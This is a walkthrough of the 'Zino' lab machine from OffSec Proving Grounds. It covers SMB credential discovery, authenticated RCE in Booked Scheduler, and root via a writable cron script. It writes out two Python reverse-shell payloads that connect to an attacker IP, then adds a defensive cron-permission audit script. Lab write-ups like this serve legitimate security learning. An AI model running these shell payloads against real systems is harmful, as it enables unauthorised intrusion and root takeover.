Zino
Writeup for Zino from OffSec Proving Grounds
Information gathering
sudo ./nmapAutomator.sh 192.168.63.64 all
Service Enumeration
FTP (Port 21)
Doesn't seem like there's much we can do here.
SMB (Port 139,445)
Looks like we can connect as zino without any password.
Since we can also download all the files, let's do that and see if there's anything interesting.
From the misc.log file, it seems like we have some credentials which would be useful later - admin:adminadmin.
HTTP (Port 8003)
Looks like this is running Booked Scheduler v2.7.5, which has an authenticated RCE vulnerability, so we must log in first.
Exploit
We can try the credentials that we got from misc.log from SMB and we successfully log in.
From here we can upload a web shell to execute any commands we want.
Payload: export RHOST="192.168.49.63";export RPORT=3306;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/usr/bin/sh")'
Privesc
Running LinPEAS, we can see that cleanup.py is a cron job that runs every 3 mins.
Looking at the cleanup.py file permissions, it seems like we have the ability to edit the file.
From here we can just overwrite the contents of cleanup.py with our payload:
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.63",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now we just wait 3 mins and we get root!
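The privesc above works only because a root cron job runs a script that an unprivileged user can edit. The following is an added example, not part of the writeup, of a small audit that parses a system crontab and flags the paths a root job executes when they are writable by others, not owned by root, or sit in a world-writable directory. The crontab text and the cleanup.py / rotate.py scripts it creates are constructed fixtures.

```python
import os
import re
import stat
import tempfile

# System crontab line: five time fields, a user field, then the command.
# (Constructed for this example; @reboot-style shortcuts are not handled.)
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def check_path(path):
    """Return the reasons a cron target could be tampered with by a non-root user."""
    reasons = []
    try:
        st = os.stat(path)
    except OSError:
        return ["missing (cron will run whatever appears at this path)"]
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    elif st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_uid != 0:
        reasons.append("not owned by root")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable (file can be replaced)")
    return reasons


def writable_cron_targets(crontab_text):
    """Map every absolute path referenced by a root cron command to its weaknesses."""
    findings = {}
    for line in crontab_text.splitlines():
        m = CRON_LINE.match(line)
        if line.lstrip().startswith("#") or not m or m.group("user") != "root":
            continue
        for path in (t for t in m.group("cmd").split() if t.startswith("/")):
            reasons = check_path(path)
            if reasons:
                findings[path] = reasons
    return findings


def build_demo():
    """Constructed fixture: a world-writable and a properly locked-down cron script."""
    tmp = tempfile.mkdtemp()                  # mode 0700, so the parent itself is not flagged
    loose = os.path.join(tmp, "cleanup.py")   # mimics the writable script in the writeup
    tight = os.path.join(tmp, "rotate.py")
    for p, mode in ((loose, 0o777), (tight, 0o755)):
        with open(p, "w") as f:
            f.write("print('housekeeping')\n")
        os.chmod(p, mode)
    crontab = (f"# constructed /etc/crontab\n*/3 * * * * root /usr/bin/python3 {loose}\n"
               f"*/3 * * * * root /usr/bin/python3 {tight}\n")
    return crontab, loose, tight


if __name__ == "__main__":
    crontab, _, _ = build_demo()
    for path, reasons in writable_cron_targets(crontab).items():
        print(f"{path}: {', '.join(reasons)}")
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d; the interpreter path is checked as well as the script, so a finding on /usr/bin/python3 means the interpreter itself is replaceable.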